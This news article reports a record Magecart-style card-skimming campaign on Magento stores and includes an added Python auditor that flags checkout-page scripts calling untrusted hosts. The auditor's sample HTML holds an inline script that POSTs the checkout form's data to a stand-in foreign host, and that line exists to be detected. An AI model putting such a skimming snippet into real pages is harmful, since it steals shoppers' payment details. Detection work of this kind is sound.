Over the past few days, thousands of Magento-powered online stores have been hacked as part of a skimming operation that has been described as “the biggest ever.”
Sansec, a Dutch cybersecurity company that specializes in solutions designed to fight digital skimming, is tracking the attack. Sansec reported on Monday that almost 2,000 Magento stores had been infiltrated as part of this effort since Friday: more than 1,000 stores were hacked on Saturday, more than 600 on Sunday, and more than 200 on Monday so far.
Most of the affected sites ran Magento 1, but some ran Magento 2.
Sansec says this is the biggest digital skimming campaign it has seen since it began tracking the threat landscape in 2015.
“The previous high in July of last year was 962 compromised stores in a single day,” the firm explained in a blog post. “The vast scale of the web skimming event this weekend reflects increased complexity and profitability. Increasingly, offenders streamlined their hacking activities to execute web skimming schemes on as many shops as practicable.”
The hackers have been planting a payment card skimmer on targeted websites as part of this effort, in what analysts have identified as a classic Magecart-style attack. The malware is designed to steal the information users enter on a compromised store’s checkout page and exfiltrate it to a server hosted in Russia.
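A checkout-page skimmer of the kind described above works by loading or embedding script that sends the payment form's contents to a host the store does not control. As an added example, not code from Sansec or from the article, the Python script below audits a constructed sample checkout page against an allowlist of hosts the store owner trusts and reports every script source, inline-script URL, and form action that points elsewhere. The host names and page content are made up for the demonstration.

```python
"""Flag script and form references on a checkout page that point outside an allowlist of trusted hosts."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample (not a real store): one legitimate first-party script,
# one injected external script, and one inline script that posts form data
# to a foreign host on submit, plus the store's own relative form action.
SAMPLE_CHECKOUT_HTML = """
<html><body>
<script src="https://shop.example/static/checkout.js"></script>
<script src="https://cdn-static.example.net/jquery.min.js"></script>
<script>
  document.addEventListener("submit", function () {
    fetch("https://collect.example.org/g", {method: "POST", body: new FormData(document.forms[0])});
  });
</script>
<form action="/checkout/onepage/savePayment"></form>
</body></html>
"""

# Hosts the store owner has approved (assumption: a real deployment would add its CDN hosts here).
ALLOWED_HOSTS = {"shop.example"}

# Absolute http(s) URLs inside inline script bodies.
URL_RE = re.compile(r"https?://[^\s'\"<>)]+")


class _Collector(HTMLParser):
    """Collects external script sources, inline script bodies and form actions."""

    def __init__(self):
        super().__init__()
        self.script_srcs = []
        self.inline_scripts = []
        self.form_actions = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            if a.get("src"):
                self.script_srcs.append(a["src"])
            else:
                self._in_script = True
                self._buf = []
        elif tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])

    def handle_data(self, data):
        # HTMLParser hands script contents over as raw data, so we just buffer it.
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline_scripts.append("".join(self._buf))


def _host(url):
    """Lower-cased hostname of a URL; empty string for relative references."""
    return (urlparse(url).hostname or "").lower()


def audit_checkout_page(html, allowed_hosts):
    """Return (finding_type, host) pairs for every reference to a host not in allowed_hosts."""
    findings = []
    c = _Collector()
    c.feed(html)
    for src in c.script_srcs:
        h = _host(src)
        if h and h not in allowed_hosts:
            findings.append(("external-script", h))
    for body in c.inline_scripts:
        for url in URL_RE.findall(body):
            h = _host(url)
            if h and h not in allowed_hosts:
                findings.append(("inline-script-foreign-url", h))
    for action in c.form_actions:
        h = _host(action)
        if h and h not in allowed_hosts:
            findings.append(("form-action-foreign", h))
    return findings


if __name__ == "__main__":
    for kind, host in audit_checkout_page(SAMPLE_CHECKOUT_HTML, ALLOWED_HOSTS):
        print(f"{kind}: {host}")
```

Run against the sample, the audit reports the injected external script host and the foreign URL inside the inline script while accepting the first-party script and the relative form action. The check only covers what is present in the served HTML; a skimmer that is injected by a server-side module into a script the store already trusts, or that builds its exfiltration URL at runtime, needs a content hash comparison or in-browser monitoring in addition to this static audit.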
Sansec estimates that over the weekend tens of thousands of users likely had their personal and financial details stolen from the affected websites.
Although the attack is still under investigation, the cybersecurity company suspects the cybercriminals may be using a new Magento vulnerability that was sold for $5,000 on a hacker website a few weeks earlier. The seller, a Russian speaker, claimed the exploit allowed remote code execution and said he was selling only 10 copies.
The malware allegedly targeted websites running Magento 1. Magento 1 has reached end of life and Adobe no longer publishes updates for it, but an estimated 95,000 websites are still powered by this version, Sansec said.